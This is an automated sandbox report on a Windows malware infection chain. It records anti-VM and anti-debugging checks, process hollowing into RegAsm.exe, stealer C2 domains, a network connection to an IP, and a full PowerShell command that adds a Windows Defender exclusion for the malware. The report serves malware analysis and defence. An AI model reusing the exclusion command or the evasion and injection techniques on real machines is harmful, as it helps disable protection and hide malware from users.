Source: MPGPH131.exe, 0000001C.00000003.2505158116.00000000012C3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91e
Source: d361f35322.exe, 00000009.00000002.3073575028.0000000001456000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}es=C:\Program Files (x86)ProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windowsee
Source: RageMP131.exe, 0000002E.00000002.2637513543.000000000100E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Y
Source: RegAsm.exe, 0000002F.00000002.2105971476.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: file300un.exe, 00000032.00000002.7140120246.000001F380020000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: d361f35322.exe, 00000024.00000002.3081226044.0000000001440000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_ABA40470
Source: file300un.exe, 00000032.00000002.7140120246.000001F380020000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: d361f35322.exe, 00000024.00000003.2762447424.0000000001447000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: JwZo/8MwiwHqIvXEAOVpRY7WnVBhrODe/dgRQYX3uczos12TJGMgUcbRf8jrvikd/VczY83oKOZAMzqKgTejI6EDzeg4bDERNuftnqULxoXXPfG6v9krfDbdf0XoQLjCXaLpea2NXecnZXJn9gK/7u4bACHwMWEsF/+YMF5I4GPCRFLE5FKoUgv0RsC+xv1D14mzjXDWhOP4HkVDCCuw0TOg7ZoSe+IcDxF44hzPxp84JxATeOKcTI44gBz6tsBxz8kV3Mr9ySGQd6AQBIufA8mBljGr2c5LvboJrUlkjspoX0E2zmf8Wi7uCKu66bwVcqk7OT/SRzGzI8Fb4KGABhhMsrgTyXTudeKduS4BCrZLqtu5HCGjWWcBWT2zygyOzYKzWCB4Jda5PJQz8Bg1lJo/Rg0HDTxGjUQV41HdqVdyXOqVkn1e8dO8sqbbOolfg2AmVM0VryhWWcGcYcoKpvYpKwQ0TFnhqGI8amAyr3+9rX+lgDhnc2WN9VR7E/PZPX17mOSQ+bU93mgEU2hPoeE4CGTPhOwddnXof5xFfl5co7tcTE3iOHouxpfJr06qt2mtqWrYr3D+gjeU0Eqvi09rsYc3LTTeHa+hFdn7HjKUcFxD7a0pHdlY9wZ6cvN0VG0ObsC25C2riwgNYAv7HbHjH6+S+pQT0NqEUKNKMPsnM9F0i4ZT0ONhHH4K0iLOkQ+ptqEq0HRdBaJVFho0AvqstqJ34CR2TTVURHTY1TUmlt0dI7LXcHzzF9yfql/YAw6y7rQAN4mT6KSsNSB268R9S0jYt4RkfcsbwCi8b/me+Id1GWEHfcsbCyywb3nLGt63vEoK6zPCwH1LiO1bQmzfEpL0LSG8bwlRfUuI6Ft4qrK34myq2u1Ou91pp93JdVAzExFYJ6xLBQXWCaONCqwThe8NrBOKH/X+ObCnB79/DiSNfv8ciu5//xyMHu7TFz76gnz6wqmjfPqiZXh9+iJkRIRECRvxgSFRwogjQ6JESfCFRAmVEB4wIsmkFRQwIglfVMCIpHK9ASMSyQ2Pxhk43wZF4wwkjIrGGYrsjcYZjBw+VsJn/6CxEk4dNVaiZXjHSoSM8Mk2bMkJmmzDaKMm2yh872Qbin/Jia+RtPj9FRMJkjIDr7NVw3n8
Source: amert.exe, amert.exe, 00000007.00000002.1869091189.00000000007FE000.00000040.00000001.01000000.0000000B.sdmp, d361f35322.exe, d361f35322.exe, 00000009.00000002.3072417756.0000000000B00000.00000040.00000001.01000000.0000000C.sdmp, explorha.exe, 0000000B.00000002.1945729188.0000000000B1E000.00000040.00000001.01000000.0000000D.sdmp, MPGPH131.exe, 0000001B.00000002.3349608067.0000000000A20000.00000040.00000001.01000000.00000012.sdmp, d361f35322.exe, 00000024.00000002.3073507178.0000000000B00000.00000040.00000001.01000000.0000000C.sdmp, RageMP131.exe, 0000002E.00000002.2634385282.0000000000BB0000.00000040.00000001.01000000.0000001B.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: RegAsm.exe, 0000002F.00000002.2105971476.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwareO#
Source: RageMP131.exe, 0000002E.00000003.2194989877.0000000001009000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: d361f35322.exe, 00000009.00000002.3073575028.0000000001456000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}yr
Source: explorta.exe, 00000005.00000002.1735792403.0000000001288000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: d361f35322.exe, 00000024.00000002.3088709368.0000000007C69000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}es=C:\Program Files (x86)ProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windowsdd
Source: d361f35322.exe, 00000024.00000003.2819365667.000000000144A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kQ+ptqEq0HRdBaJVFho0AvqstqJ34CR2TTVURHTY1TUmlt0dI7LXcHzzF9yfql/YAw6y7rQAN4mT6KSsNSB268R9S0jYt4RkfcsbwCi8b/me+Id1GWEHfcsbCyywb3nLGt63vEoK6zPCwH1LiO1bQmzfEpL0LSG8bwlRfUuI6Ft4qrK34myq2u1Ou91pp93JdVAzExFYJ6xLBQXWCaONCqwThe8NrBOKH/X+ObCnB79/DiSNfv8ciu5//xyMHu7TFz76gnz6wqmjfPqiZXh9+iJkRIRECRvxgSFRwogjQ6JESfCFRAmVEB4wIsmkFRQwIglfVMCIpHK9ASMSyQ2Pxhk43wZF4wwkjIrGGYrsjcYZjBw+VsJn/6CxEk4dNVaiZXjHSoSM8Mk2bMkJmmzDaKMm2yh872Qbin/Jia+RtPj9FRMJkjIDr7NVw3n8
Source: d361f35322.exe, 00000009.00000003.1936676269.000000000142F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-
Source: file300un.exe, 00000032.00000002.7140120246.000001F380020000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: file300un.exe, 00000032.00000002.7140120246.000001F380020000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
Source: d361f35322.exe, 00000024.00000003.2819365667.000000000144A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kQ+ptqEq0HRdBaJVFho0AvqstqJ34CR2TTVURHTY1TUmlt0dI7LXcHzzF9yfql/YAw6y7rQAN4mT6KSsNSB268R9S0jYt4RkfcsbwCi8b/me+Id1GWEHfcsbCyywb3nLGt63vEoK6zPCwH1LiO1bQmzfEpL0LSG8bwlRfUuI6Ft4qrK34myq2u1Ou91pp93JdVAzExFYJ6xLBQXWCaONCqwThe8NrBOKH/X+ObCnB79/DiSNfv8ciu5//xyMHu7TFz76gnz6wqmjfPqiZXh9+iJkRIRECRvxgSFRwogjQ6JESfCFRAmVEB4wIsmkFRQwIglfVMCIpHK9ASMSyQ2Pxhk43wZF4wwkjIrGGYrsjcYZjBw+VsJn/6CxEk4dNVaiZXjHSoSM8Mk2bMkJmmzDaKMm2yh872Qbin/Jia+RtPj9FRMJkjIDr7NVw3n
Source: file300un.exe, 00000032.00000002.7140120246.000001F380020000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: d361f35322.exe, 00000009.00000003.2912737740.0000000007DE3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: cqk7OT/SRzGzI8Fb4KGABhhMsrgTyXTudeKduS4BCrZLqtu5HCGjWWcBWT2zygyOzYKzWCB4Jda5PJQz8Bg1lJo/Rg0HDTxGjUQV41HdqVdyXOqVkn1e8dO8sqbbOolfg2AmVM0VryhWWcGcYcoKpvYpKwQ0TFnhqGI8amAyr3+9rX+lgDhnc2WN9VR7E/PZPX17mOSQ+bU93mgEU2hPoeE4CGTPhOwddnXof5xFfl5co7tcTE3iOHouxpfJr06qt2mtqWrYr3D+gjeU0Eqvi09rsYc3LTTeHa+hFdn7HjKUcFxD7a0pHdlY9wZ6cvN0VG0ObsC25C2riwgNYAv7HbHjH6+S+pQT0NqEUKNKMPsnM9F0i4ZT0ONhHH4K0iLOkQ+ptqEq0HRdBaJVFho0AvqstqJ34CR2TTVURHTY1TUmlt0dI7LXcHzzF9yfql/YAw6y7rQAN4mT6KSsNSB268R9S0jYt4RkfcsbwCi8b/me+Id1GWEHfcsbCyywb3nLGt63vEoK6zPCwH1LiO1bQmzfEpL0LSG8bwlRfUuI6Ft4qrK34myq2u1Ou91pp93JdVAzExFYJ6xLBQXWCaONCqwThe8NrBOKH/X+ObCnB79/DiSNfv8ciu5//xyMHu7TFz76gnz6wqmjfPqiZXh9+iJkRIRECRvxgSFRwogjQ6JESfCFRAmVEB4wIsmkFRQwIglfVMCIpHK9ASMSyQ2Pxhk43wZF4wwkjIrGGYrsjcYZjBw+VsJn/6CxEk4dNVaiZXjHSoSM8Mk2bMkJmmzDaKMm2yh872Qbin/Jia+RtPj9FRMJkjIDr7NVw3n
Source: d361f35322.exe, 00000024.00000002.3079225585.00000000013F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWL
Source: amert.exe, 00000007.00000002.1869091189.00000000007FE000.00000040.00000001.01000000.0000000B.sdmp, d361f35322.exe, 00000009.00000002.3072417756.0000000000B00000.00000040.00000001.01000000.0000000C.sdmp, explorha.exe, 0000000B.00000002.1945729188.0000000000B1E000.00000040.00000001.01000000.0000000D.sdmp, MPGPH131.exe, 0000001B.00000002.3349608067.0000000000A20000.00000040.00000001.01000000.00000012.sdmp, d361f35322.exe, 00000024.00000002.3073507178.0000000000B00000.00000040.00000001.01000000.0000000C.sdmp, RageMP131.exe, 0000002E.00000002.2634385282.0000000000BB0000.00000040.00000001.01000000.0000001B.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: d361f35322.exe, 00000009.00000002.3073575028.00000000013E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_ABA40470}
Source: RageMP131.exe, 0000002E.00000002.2637513543.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\Users\user\AppData\Local\Temp\1000235001\toolspub1.exe System information queried: CodeIntegrityInformation
Hides threads from debuggers
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread information set: HideFromDebugger
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Thread information set: HideFromDebugger
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Thread information set: HideFromDebugger
Potentially malicious time measurement code found
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_052D03D1 Start: 052D06B7 End: 052D0461 9_2_052D03D1
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: SICE
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000235001\toolspub1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Code function: 7_2_05010B4F rdtsc 7_2_05010B4F
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_008A4130 mov eax, dword ptr fs:[00000030h] 9_2_008A4130
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_00871A60 mov eax, dword ptr fs:[00000030h] 9_2_00871A60
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 193.233.132.56 80
.NET source code references suspicious native API functions
Source: swiiiii[1].exe.10.dr, Angelo.cs Reference to suspicious API methods: Program.GetProcAddress(Program.GetModuleHandle(aScsrhgtr), "FreeConsole")
Source: swiiiii[1].exe.10.dr, Angelo.cs Reference to suspicious API methods: Program.GetProcAddress(Program.GetModuleHandle(aScsrhgtr), "VirtualProtectEx")
Source: file300un[1].exe.10.dr, -.cs Reference to suspicious API methods: _FDDD_FDFD_FBD0_066C_FDD3_0611_FDFC_FDD9.LoadLibrary(_FDD4_FD3E_06D8(_FD42_066A_061F_FBB7_060E_066D._0650_FBBC_FDE8))
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe" -Force
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe" -Force
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\1000235001\toolspub1.exe Thread created: unknown EIP: 34419A0
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
LummaC encrypted strings found
Source: RegAsm.exe, 0000001D.00000002.2189256789.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: pillowbrocccolipe.shop
Source: RegAsm.exe, 0000001D.00000002.2189256789.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: communicationgenerwo.shop
Source: RegAsm.exe, 0000001D.00000002.2189256789.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: diskretainvigorousiw.shop
Source: RegAsm.exe, 0000001D.00000002.2189256789.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: affordcharmcropwo.shop
Source: RegAsm.exe, 0000001D.00000002.2189256789.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: dismissalcylinderhostw.shop
Source: RegAsm.exe, 0000001D.00000002.2189256789.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: enthusiasimtitleow.shop
Source: RegAsm.exe, 0000001D.00000002.2189256789.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: worryfillvolcawoi.shop
Source: RegAsm.exe, 0000001D.00000002.2189256789.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: cleartotalfisherwo.shop
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\Temp\1000235001\toolspub1.exe Section loaded: NULL target: unknown protection: read write
Source: C:\Users\user\AppData\Local\Temp\1000235001\toolspub1.exe Section loaded: NULL target: unknown protection: execute and read
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base address: 400000
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 439000
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43C000
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 447000
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 629008
Source: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41B000
Source: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 423000
Source: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 636000
Source: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: BF3008
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 404000
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 406000
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: BDB008
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Process created: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe "C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Process created: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe "C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Process created: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe "C:\Users\user\AppData\Local\Temp\1000019001\amert.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Process created: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe "C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Process created: C:\Users\user\1000021002\ac861238af.exe "C:\Users\user\1000021002\ac861238af.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe "C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe"
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe "C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe"
